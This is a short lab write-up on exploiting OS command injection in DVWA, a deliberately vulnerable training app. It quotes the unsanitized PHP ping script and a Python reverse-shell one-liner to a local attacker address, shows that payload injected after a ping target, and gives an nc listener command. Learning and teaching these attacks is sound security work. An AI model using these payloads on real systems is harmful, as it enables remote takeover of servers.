Command Injection with DVWA

Background

Injection attacks are number 3 on the OWASP Top 10. There are a number of different types of injection attacks including SQL, OS command, and LDAP injection with 33 common weakness enumerations. We'll use the DVWA to demonstrate a simple exploitation of an OS command injection vulnerability.

The application uses a php script to execute a ping command and reflect the results back to the user. The user supplies the input and if not properly sanitized then an injection vulnerability may exist.

Normal Interaction

Source Code Review

// vulnerable php script
<?php
if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?>

The source code shows no sanitization is performed on the input we submit to the application. We can simply chain an OS level command to achieve remote code execution and as an example I will exploit the vulnerability to open a reverse shell.

Exploiting to get a shell

Remote Shell Success!

How to Reproduce

  1. You will need a reverse shell payload, there are many sources to discover these using python, bin/bash, socat or others. I used a python payload.

# Reverse Shell Payload
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.128",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

  1. The payload is chained with the ping to server 8.8.8.8 which will cause execution of the python in-line script. 

// Command Injection Payload
8.8.8.8 & python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.128",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

  1. Make sure your listener is ready for the incoming connection.

# Set up listener with nc
nc -lvp 8888
First open a listener to receive the reverse shell
Prepare your payload
The reverse shell is open

You can try many different payloads, its no guarantee that python is installed on every server. I linked some resources to payloads and more details on command injection below.

Resources

PreviousBroken Access Control with DVWANextBurpSuite Intro

Last updated